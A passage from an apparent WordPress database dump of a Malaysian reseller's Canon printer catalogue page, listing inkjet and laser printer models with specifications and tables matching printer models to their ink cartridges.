width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 10:07:23','2019-09-25 02:07:23','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3328,1,'2019-09-25 10:06:29','2019-09-25 02:06:29','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E4270</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E470</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E477</td>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E480</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E510</td>\n<td>CL-98 (Colour)</td>\n</tr>\n<tr>\n<td>PG-88 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G2010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G4010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP100</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA iP1300</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 